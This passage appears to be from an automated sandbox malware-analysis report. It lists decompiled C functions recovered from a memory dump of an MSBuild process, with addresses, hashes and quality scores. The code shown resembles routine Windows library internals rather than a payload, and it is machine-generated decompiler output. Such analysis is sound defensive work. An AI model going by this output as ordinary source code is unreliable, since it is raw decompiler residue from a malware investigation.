                                            				intOrPtr _t59;
                                            				signed int _t64;
                                            				signed int _t67;
                                            				signed int* _t71;
                                            				signed int _t74;
                                            				signed int _t77;
                                            				signed int _t82;
                                            				intOrPtr* _t84;
                                            				void* _t85;
                                            				intOrPtr* _t87;
                                            				void* _t94;
                                            				signed int _t95;
                                            				intOrPtr* _t97;
                                            				signed int _t99;
                                            				signed int _t102;
                                            				void* _t104;
                                            
                                            				_push(__ebx);
                                            				_push(__esi);
                                            				_push(__edi);
                                            				_t97 = __ecx;
                                            				_t102 =  *(__ecx + 0x14);
                                            				if((_t102 & 0x02ffffff) == 0x2000000) {
                                            					_t102 = _t102 | 0x000007d0;
                                            				}
                                            				_t48 =  *[fs:0x30];
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                            					_t102 = _t102 & 0xff000000;
                                            				}
                                            				_t80 = 0x10f85ec;
                                            				E01022280(_t48, 0x10f85ec);
                                            				_t51 =  *_t97 + 8;
                                            				if( *_t51 != 0) {
                                            					L6:
                                            					return E0101FFB0(_t80, _t97, _t80);
                                            				} else {
                                            					 *(_t97 + 0x14) = _t102;
                                            					_t84 =  *0x10f538c; // 0x771a6828
                                            					if( *_t84 != 0x10f5388) {
                                            						_t85 = 3;
                                            						asm("int 0x29");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						_push(0x2c);
                                            						_push(0x10df6e8);
                                            						E0105D0E8(0x10f85ec, _t97, _t102);
                                            						 *((char*)(_t104 - 0x1d)) = 0;
                                            						_t99 =  *(_t104 + 8);
                                            						__eflags = _t99;
                                            						if(_t99 == 0) {
                                            							L13:
                                            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            							if(__eflags == 0) {
                                            								E010D88F5(_t80, _t85, 0x10f5388, _t99, _t102, __eflags);
                                            							}
                                            						} else {
                                            							__eflags = _t99 -  *0x10f86c0; // 0xac07b0
                                            							if(__eflags == 0) {
                                            								goto L13;
                                            							} else {
                                            								__eflags = _t99 -  *0x10f86b8; // 0x0
                                            								if(__eflags == 0) {
                                            									goto L13;
                                            								} else {
                                            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                            									__eflags =  *((char*)(_t59 + 0x28));
                                            									if( *((char*)(_t59 + 0x28)) == 0) {
                                            										E01022280(_t99 + 0xe0, _t99 + 0xe0);
                                            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                            										__eflags =  *((char*)(_t99 + 0xe5));
                                            										if(__eflags != 0) {
                                            											E010D88F5(0x10f85ec, _t85, 0x10f5388, _t99, _t102, __eflags);
                                            										} else {
                                            											__eflags =  *((char*)(_t99 + 0xe4));
                                            											if( *((char*)(_t99 + 0xe4)) == 0) {
                                            												 *((char*)(_t99 + 0xe4)) = 1;
                                            												_push(_t99);
                                            												_push( *((intOrPtr*)(_t99 + 0x24)));
                                            												E0104AFD0();
                                            											}
                                            											while(1) {
                                            												_t71 = _t99 + 8;
                                            												 *(_t104 - 0x2c) = _t71;
                                            												_t80 =  *_t71;
                                            												_t95 = _t71[1];
                                            												 *(_t104 - 0x28) = _t80;
                                            												 *(_t104 - 0x24) = _t95;
                                            												while(1) {
                                            													L19:
                                            													__eflags = _t95;
                                            													if(_t95 == 0) {
                                            														break;
                                            													}
                                            													_t102 = _t80;
                                            													 *(_t104 - 0x30) = _t95;
                                            													 *(_t104 - 0x24) = _t95 - 1;
                                            													asm("lock cmpxchg8b [edi]");
                                            													_t80 = _t102;
                                            													 *(_t104 - 0x28) = _t80;
                                            													 *(_t104 - 0x24) = _t95;
                                            													__eflags = _t80 - _t102;
                                            													_t99 =  *(_t104 + 8);
                                            													if(_t80 != _t102) {
                                            														continue;
                                            													} else {
                                            														__eflags = _t95 -  *(_t104 - 0x30);
                                            														if(_t95 !=  *(_t104 - 0x30)) {
                                            															continue;
                                            														} else {
                                            															__eflags = _t95;
                                            															if(_t95 != 0) {
                                            																_t74 = 0;
                                            																 *(_t104 - 0x34) = 0;
                                            																_t102 = 0;
                                            																__eflags = 0;
                                            																while(1) {
                                            																	 *(_t104 - 0x3c) = _t102;
                                            																	__eflags = _t102 - 3;
                                            																	if(_t102 >= 3) {
                                            																		break;
                                            																	}
                                            																	__eflags = _t74;
                                            																	if(_t74 != 0) {
                                            																		L49:
                                            																		_t102 =  *_t74;
                                            																		__eflags = _t102;
                                            																		if(_t102 != 0) {
                                            																			_t102 =  *(_t102 + 4);
                                            																			__eflags = _t102;
                                            																			if(_t102 != 0) {
                                            																				 *0x10fb1e0(_t74, _t99);
                                            																				 *_t102();
                                            																			}
                                            																		}
                                            																		do {
                                            																			_t71 = _t99 + 8;
                                            																			 *(_t104 - 0x2c) = _t71;
                                            																			_t80 =  *_t71;
                                            																			_t95 = _t71[1];
                                            																			 *(_t104 - 0x28) = _t80;
                                            																			 *(_t104 - 0x24) = _t95;
                                            																			goto L19;
                                            																		} while (_t74 == 0);
                                            																		goto L49;
                                            																	} else {
                                            																		_t82 = 0;
                                            																		__eflags = 0;
                                            																		while(1) {
                                            																			 *(_t104 - 0x38) = _t82;
                                            																			__eflags = _t82 -  *0x10f84c0;
                                            																			if(_t82 >=  *0x10f84c0) {
                                            																				break;
                                            																			}
                                            																			__eflags = _t74;
                                            																			if(_t74 == 0) {
                                            																				_t77 = E010D9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                            																				__eflags = _t77;
                                            																				if(_t77 == 0) {
                                            																					_t74 = 0;
                                            																					__eflags = 0;
                                            																				} else {
                                            																					_t74 = _t77 + 0xfffffff4;
                                            																				}
                                            																				 *(_t104 - 0x34) = _t74;
                                            																				_t82 = _t82 + 1;
                                            																				continue;
                                            																			}
                                            																			break;
                                            																		}
                                            																		_t102 = _t102 + 1;
                                            																		continue;
                                            																	}
                                            																	goto L20;
                                            																}
                                            																__eflags = _t74;
                                            															}
                                            														}
                                            													}
                                            													break;
                                            												}
                                            												L20:
                                            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                            												 *((char*)(_t99 + 0xe5)) = 1;
                                            												 *((char*)(_t104 - 0x1d)) = 1;
                                            												goto L21;
                                            											}
                                            										}
                                            										L21:
                                            										 *(_t104 - 4) = 0xfffffffe;
                                            										E0100922A(_t99);
                                            										_t64 = E01027D50();
                                            										__eflags = _t64;
                                            										if(_t64 != 0) {
                                            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            										} else {
                                            											_t67 = 0x7ffe0386;
                                            										}
                                            										__eflags =  *_t67;
                                            										if( *_t67 != 0) {
                                            											_t67 = E010D8B58(_t99);
                                            										}
                                            										__eflags =  *((char*)(_t104 - 0x1d));
                                            										if( *((char*)(_t104 - 0x1d)) != 0) {
                                            											__eflags = _t99 -  *0x10f86c0; // 0xac07b0
                                            											if(__eflags != 0) {
                                            												__eflags = _t99 -  *0x10f86b8; // 0x0
                                            												if(__eflags == 0) {
                                            													_t94 = 0x10f86bc;
                                            													_t87 = 0x10f86b8;
                                            													goto L27;
                                            												} else {
                                            													__eflags = _t67 | 0xffffffff;
                                            													asm("lock xadd [edi], eax");
                                            													if(__eflags == 0) {
                                            														E01009240(_t80, _t99, _t99, _t102, __eflags);
                                            													}
                                            												}
                                            											} else {
                                            												_t94 = 0x10f86c4;
                                            												_t87 = 0x10f86c0;
                                            												L27:
                                            												E01039B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                            											}
                                            										}
                                            									} else {
                                            										goto L13;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						return E0105D130(_t80, _t99, _t102);
                                            					} else {
                                            						 *_t51 = 0x10f5388;
                                            						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                            						 *_t84 = _t51;
                                            						 *0x10f538c = _t51;
                                            						goto L6;
                                            					}
                                            				}
                                            			}




















                                            0x01009082
                                            0x01009083
                                            0x01009084
                                            0x01009085
                                            0x01009087
                                            0x01009096
                                            0x01009098
                                            0x01009098
                                            0x0100909e
                                            0x010090a8
                                            0x010090e7
                                            0x010090e7
                                            0x010090aa
                                            0x010090b0
                                            0x010090b7
                                            0x010090bd
                                            0x010090dd
                                            0x010090e6
                                            0x010090bf
                                            0x010090bf
                                            0x010090c7
                                            0x010090cf
                                            0x010090f1
                                            0x010090f2
                                            0x010090f4
                                            0x010090f5
                                            0x010090f6
                                            0x010090f7
                                            0x010090f8
                                            0x010090f9
                                            0x010090fa
                                            0x010090fb
                                            0x010090fc
                                            0x010090fd
                                            0x010090fe
                                            0x010090ff
                                            0x01009100
                                            0x01009102
                                            0x01009107
                                            0x0100910c
                                            0x01009110
                                            0x01009113
                                            0x01009115
                                            0x01009136
                                            0x0100913f
                                            0x01009143
                                            0x010637e4
                                            0x010637e4
                                            0x01009117
                                            0x01009117
                                            0x0100911d
                                            0x00000000
                                            0x0100911f
                                            0x0100911f
                                            0x01009125
                                            0x00000000
                                            0x01009127
                                            0x0100912d
                                            0x01009130
                                            0x01009134
                                            0x01009158
                                            0x0100915d
                                            0x01009161
                                            0x01009168
                                            0x01063715
                                            0x0100916e
                                            0x0100916e
                                            0x01009175
                                            0x01009177
                                            0x0100917e
                                            0x0100917f
                                            0x01009182
                                            0x01009182
                                            0x01009187
                                            0x01009187
                                            0x0100918a
                                            0x0100918d
                                            0x0100918f
                                            0x01009192
                                            0x01009195
                                            0x01009198
                                            0x01009198
                                            0x01009198
                                            0x0100919a
                                            0x00000000
                                            0x00000000
                                            0x0106371f
                                            0x01063721
                                            0x01063727
                                            0x0106372f
                                            0x01063733
                                            0x01063735
                                            0x01063738
                                            0x0106373b
                                            0x0106373d
                                            0x01063740
                                            0x00000000
                                            0x01063746
                                            0x01063746
                                            0x01063749
                                            0x00000000
                                            0x0106374f
                                            0x0106374f
                                            0x01063751
                                            0x01063757
                                            0x01063759
                                            0x0106375c
                                            0x0106375c
                                            0x0106375e
                                            0x0106375e
                                            0x01063761
                                            0x01063764
                                            0x00000000
                                            0x00000000
                                            0x01063766
                                            0x01063768
                                            0x010637a3
                                            0x010637a3
                                            0x010637a5
                                            0x010637a7
                                            0x010637ad
                                            0x010637b0
                                            0x010637b2
                                            0x010637bc
                                            0x010637c2
                                            0x010637c2
                                            0x010637b2
                                            0x01009187
                                            0x01009187
                                            0x0100918a
                                            0x0100918d
                                            0x0100918f
                                            0x01009192
                                            0x01009195
                                            0x00000000
                                            0x01009195
                                            0x00000000
                                            0x0106376a
                                            0x0106376a
                                            0x0106376a
                                            0x0106376c
                                            0x0106376c
                                            0x0106376f
                                            0x01063775
                                            0x00000000
                                            0x00000000
                                            0x01063777
                                            0x01063779
                                            0x01063782
                                            0x01063787
                                            0x01063789
                                            0x01063790
                                            0x01063790
                                            0x0106378b
                                            0x0106378b
                                            0x0106378b
                                            0x01063792
                                            0x01063795
                                            0x00000000
                                            0x01063795
                                            0x00000000
                                            0x01063779
                                            0x01063798
                                            0x00000000
                                            0x01063798
                                            0x00000000
                                            0x01063768
                                            0x0106379b
                                            0x0106379b
                                            0x01063751
                                            0x01063749
                                            0x00000000
                                            0x01063740
                                            0x010091a0
                                            0x010091a3
                                            0x010091a9
                                            0x010091b0
                                            0x00000000
                                            0x010091b0
                                            0x01009187
                                            0x010091b4
                                            0x010091b4
                                            0x010091bb
                                            0x010091c0
                                            0x010091c5
                                            0x010091c7
                                            0x010637da
                                            0x010091cd
                                            0x010091cd
                                            0x010091cd
                                            0x010091d2
                                            0x010091d5
                                            0x01009239
                                            0x01009239
                                            0x010091d7
                                            0x010091db
                                            0x010091e1
                                            0x010091e7
                                            0x010091fd
                                            0x01009203
                                            0x0100921e
                                            0x01009223
                                            0x00000000
                                            0x01009205
                                            0x01009205
                                            0x01009208
                                            0x0100920c
                                            0x01009214
                                            0x01009214
                                            0x0100920c
                                            0x010091e9
                                            0x010091e9
                                            0x010091ee
                                            0x010091f3
                                            0x010091f3
                                            0x010091f3
                                            0x010091e7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01009134
                                            0x01009125
                                            0x0100911d
                                            0x0100914e
                                            0x010090d1
                                            0x010090d1
                                            0x010090d3
                                            0x010090d6
                                            0x010090d8
                                            0x00000000
                                            0x010090d8
                                            0x010090cf

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e34d923b6fb5913db6d9aa9639d108d0ad103908ad6889cc3c64b3d861b92be
                                            • Instruction ID: f39896792662c817a875f9d5e60ca000d4a6ac46420128eb897564a2b2fa33cf
                                            • Opcode Fuzzy Hash: 4e34d923b6fb5913db6d9aa9639d108d0ad103908ad6889cc3c64b3d861b92be
                                            • Instruction Fuzzy Hash: D801F4726012018FE326CF0CDC40B117BE9EF41325F21806AF2898BAD2C375DC41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0109C450(intOrPtr* _a4) {
                                            				signed char _t25;
                                            				intOrPtr* _t26;
                                            				intOrPtr* _t27;
                                            
                                            				_t26 = _a4;
                                            				_t25 =  *(_t26 + 0x10);
                                            				if((_t25 & 0x00000003) != 1) {
                                            					_push(0);
                                            					_push(0);
                                            					_push(0);
                                            					_push( *((intOrPtr*)(_t26 + 8)));
                                            					_push(0);
                                            					_push( *_t26);
                                            					E01049910();
                                            					_t25 =  *(_t26 + 0x10);
                                            				}
                                            				if((_t25 & 0x00000001) != 0) {
                                            					_push(4);
                                            					_t7 = _t26 + 4; // 0x4
                                            					_t27 = _t7;
                                            					_push(_t27);
                                            					_push(5);
                                            					_push(0xfffffffe);
                                            					E010495B0();
                                            					if( *_t27 != 0) {
                                            						_push( *_t27);
                                            						E010495D0();
                                            					}
                                            				}
                                            				_t8 = _t26 + 0x14; // 0x14
                                            				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                            				}
                                            				_push( *_t26);
                                            				E010495D0();
                                            				return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                            			}






                                            0x0109c458
                                            0x0109c45d
                                            0x0109c466
                                            0x0109c468
                                            0x0109c469
                                            0x0109c46a
                                            0x0109c46b
                                            0x0109c46e
                                            0x0109c46f
                                            0x0109c471
                                            0x0109c476
                                            0x0109c476
                                            0x0109c47c
                                            0x0109c47e
                                            0x0109c480
                                            0x0109c480
                                            0x0109c483
                                            0x0109c484
                                            0x0109c486
                                            0x0109c488
                                            0x0109c48f
                                            0x0109c491
                                            0x0109c493
                                            0x0109c493
                                            0x0109c48f
                                            0x0109c498
                                            0x0109c49e
                                            0x0109c4ad
                                            0x0109c4ad
                                            0x0109c4b2
                                            0x0109c4b4
                                            0x0109c4cd

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                            • Instruction ID: 95387c7e2cad9286929e412b2a1d52fe0f65ddd72528a14bda7418b5a3a1c469
                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                            • Instruction Fuzzy Hash: 9A0180B2240506BFEB21AF69CD90EA3BB6DFB64794F104535F29442560CB31ACA0DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E010D4015(signed int __eax, signed int __ecx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t10;
                                            				signed int _t28;
                                            
                                            				_push(__ecx);
                                            				_t28 = __ecx;
                                            				asm("lock xadd [edi+0x24], eax");
                                            				_t10 = (__eax | 0xffffffff) - 1;
                                            				if(_t10 == 0) {
                                            					_t1 = _t28 + 0x1c; // 0x1e
                                            					E01022280(_t10, _t1);
                                            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            					E01022280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10f86ac);
                                            					E0100F900(0x10f86d4, _t28);
                                            					E0101FFB0(0x10f86ac, _t28, 0x10f86ac);
                                            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                            					E0101FFB0(0, _t28, _t1);
                                            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                            					}
                                            					_t10 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                            				}
                                            				return _t10;
                                            			}







                                            0x010d401a
                                            0x010d401e
                                            0x010d4023
                                            0x010d4028
                                            0x010d4029
                                            0x010d402b
                                            0x010d402f
                                            0x010d4043
                                            0x010d4046
                                            0x010d4051
                                            0x010d4057
                                            0x010d405f
                                            0x010d4062
                                            0x010d4067
                                            0x010d406f
                                            0x010d407c
                                            0x010d407c
                                            0x010d408c
                                            0x010d408c
                                            0x010d4097

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9a2c25d48d80726a3c9e9d314105c737c6592a27ab0096fb995bf98a9e7e24e
                                            • Instruction ID: 08c44c41115ac5ca9f95fa0b02d5cf64ea6f03df85b73ef1acbe96d5063db303
                                            • Opcode Fuzzy Hash: a9a2c25d48d80726a3c9e9d314105c737c6592a27ab0096fb995bf98a9e7e24e
                                            • Instruction Fuzzy Hash: 9901A7722016567FD351AB79CD80E93B7ACFF69650B000229F548C7E11CB34EC11C6E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E010C138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_t32 = __edx;
                                            				_t27 = __ebx;
                                            				_v8 =  *0x10fd360 ^ _t35;
                                            				_t33 = __edx;
                                            				_t34 = __ecx;
                                            				E0104FA60( &_v60, 0, 0x30);
                                            				_v20 = _a4;
                                            				_v16 = _a8;
                                            				_v28 = _t34;
                                            				_v24 = _t33;
                                            				_v54 = 0x1033;
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0388;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}

















                                            0x010c138a
                                            0x010c138a
                                            0x010c1399
                                            0x010c13a3
                                            0x010c13a8
                                            0x010c13aa
                                            0x010c13b5
                                            0x010c13bb
                                            0x010c13c3
                                            0x010c13c6
                                            0x010c13c9
                                            0x010c13d4
                                            0x010c13e6
                                            0x010c13d6
                                            0x010c13df
                                            0x010c13df
                                            0x010c13f1
                                            0x010c13f2
                                            0x010c13f4
                                            0x010c13f9
                                            0x010c140e

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe5e5e53bdb5e0b0231c7a77a2399fb4b60caf57bbf1998307ef58795e1e4d52
                                            • Instruction ID: 69177e6af7cac50c15a7b57ed65ac5c65bb6abc3a43c0d470434c800ec9b804d
                                            • Opcode Fuzzy Hash: fe5e5e53bdb5e0b0231c7a77a2399fb4b60caf57bbf1998307ef58795e1e4d52
                                            • Instruction Fuzzy Hash: A3015271A00219AFDB14DFA9D881FAEBBB8EF54710F40406AF944EB281D674DA11CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E010C14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_t32 = __edx;
                                            				_t27 = __ebx;
                                            				_v8 =  *0x10fd360 ^ _t35;
                                            				_t33 = __edx;
                                            				_t34 = __ecx;
                                            				E0104FA60( &_v60, 0, 0x30);
                                            				_v20 = _a4;
                                            				_v16 = _a8;
                                            				_v28 = _t34;
                                            				_v24 = _t33;
                                            				_v54 = 0x1034;
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0388;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}

















                                            0x010c14fb
                                            0x010c14fb
                                            0x010c150a
                                            0x010c1514
                                            0x010c1519
                                            0x010c151b
                                            0x010c1526
                                            0x010c152c
                                            0x010c1534
                                            0x010c1537
                                            0x010c153a
                                            0x010c1545
                                            0x010c1557
                                            0x010c1547
                                            0x010c1550
                                            0x010c1550
                                            0x010c1562
                                            0x010c1563
                                            0x010c1565
                                            0x010c156a
                                            0x010c157f

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3ca091e61473b9bf20bc84b8b27aa999345d3985253183f531cbf49d515c63b
                                            • Instruction ID: 33d6151a740f8e230f63b7da7c1078d31f2ff5ce9d827566134614482bf4fc37
                                            • Opcode Fuzzy Hash: d3ca091e61473b9bf20bc84b8b27aa999345d3985253183f531cbf49d515c63b
                                            • Instruction Fuzzy Hash: 50019271A00259EFDB10DFA8D841EEEBBB8EF54700F44406AF944EB281D674DA00CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E010058EC(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				char _v28;
                                            				char _v44;
                                            				char _v76;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t10;
                                            				intOrPtr _t16;
                                            				intOrPtr _t17;
                                            				intOrPtr _t27;
                                            				intOrPtr _t28;
                                            				signed int _t29;
                                            
                                            				_v8 =  *0x10fd360 ^ _t29;
                                            				_t10 =  *[fs:0x30];
                                            				_t27 = __ecx;
                                            				if(_t10 == 0) {
                                            					L6:
                                            					_t28 = 0xfe5c80;
                                            				} else {
                                            					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                            					if(_t16 == 0) {
                                            						goto L6;
                                            					} else {
                                            						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                            					}
                                            				}
                                            				if(E01005943() != 0 &&  *0x10f5320 > 5) {
                                            					E01087B5E( &_v44, _t27);
                                            					_t22 =  &_v28;
                                            					E01087B5E( &_v28, _t28);
                                            					_t11 = E01087B9C(0x10f5320, 0xfebf15,  &_v28, _t22, 4,  &_v76);
                                            				}
                                            				return E0104B640(_t11, _t17, _v8 ^ _t29, 0xfebf15, _t27, _t28);
                                            			}















                                            0x010058fb
                                            0x010058fe
                                            0x01005906
                                            0x0100590a
                                            0x0100593c
                                            0x0100593c
                                            0x0100590c
                                            0x0100590c
                                            0x01005911
                                            0x00000000
                                            0x01005913
                                            0x01005913
                                            0x01005913
                                            0x01005911
                                            0x0100591d
                                            0x01061035
                                            0x0106103c
                                            0x0106103f
                                            0x01061056
                                            0x01061056
                                            0x0100593b

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ea54db85a7fd3c3b400d12ac2e908bcd6a67322a11c761f10c5e40e45dbcacd
                                            • Instruction ID: cf6ea734f14873112b785ab70a7aee5db8a5eccb0bfe59cba6da219a249a4466
                                            • Opcode Fuzzy Hash: 3ea54db85a7fd3c3b400d12ac2e908bcd6a67322a11c761f10c5e40e45dbcacd
                                            • Instruction Fuzzy Hash: 1301F231A00505ABE714EA79CC01AAE7BA9EF81220F5440A9AA85AB684DE30DD02CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0101B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                            				signed char _t11;
                                            				signed char* _t12;
                                            				intOrPtr _t24;
                                            				signed short* _t25;
                                            
                                            				_t25 = __edx;
                                            				_t24 = __ecx;
                                            				_t11 = ( *[fs:0x30])[0x50];
                                            				if(_t11 != 0) {
                                            					if( *_t11 == 0) {
                                            						goto L1;
                                            					}
                                            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                            					L2:
                                            					if( *_t12 != 0) {
                                            						_t12 =  *[fs:0x30];
                                            						if((_t12[0x240] & 0x00000004) == 0) {
                                            							goto L3;
                                            						}
                                            						if(E01027D50() == 0) {
                                            							_t12 = 0x7ffe0385;
                                            						} else {
                                            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                            						}
                                            						if(( *_t12 & 0x00000020) == 0) {
                                            							goto L3;
                                            						}
                                            						return E01087016(_a4, _t24, 0, 0, _t25, 0);
                                            					}
                                            					L3:
                                            					return _t12;
                                            				}
                                            				L1:
                                            				_t12 = 0x7ffe0384;
                                            				goto L2;
                                            			}







                                            0x0101b037
                                            0x0101b039
                                            0x0101b03b
                                            0x0101b040
                                            0x0106a60e
                                            0x00000000
                                            0x00000000
                                            0x0106a61d
                                            0x0101b04b
                                            0x0101b04e
                                            0x0106a627
                                            0x0106a634
                                            0x00000000
                                            0x00000000
                                            0x0106a641
                                            0x0106a653
                                            0x0106a643
                                            0x0106a64c
                                            0x0106a64c
                                            0x0106a65b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0106a66c
                                            0x0101b057
                                            0x0101b057
                                            0x0101b057
                                            0x0101b046
                                            0x0101b046
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                            • Instruction ID: 944dddd81bb00faa1c7f6bb171c15c88e8a68d76b2715b13922a28f9606402f9
                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                            • Instruction Fuzzy Hash: 41018F32704980DFE323971CC988F6A7BECEB85750F0900E1FA99CBA65D728DC40C620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010D1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                            				char _v8;
                                            				void* _v11;
                                            				unsigned int _v12;
                                            				void* _v15;
                                            				void* __esi;
                                            				void* __ebp;
                                            				char* _t16;
                                            				signed int* _t35;
                                            
                                            				_t22 = __ebx;
                                            				_t35 = __ecx;
                                            				_v8 = __edx;
                                            				_t13 =  !( *__ecx) + 1;
                                            				_v12 =  !( *__ecx) + 1;
                                            				if(_a4 != 0) {
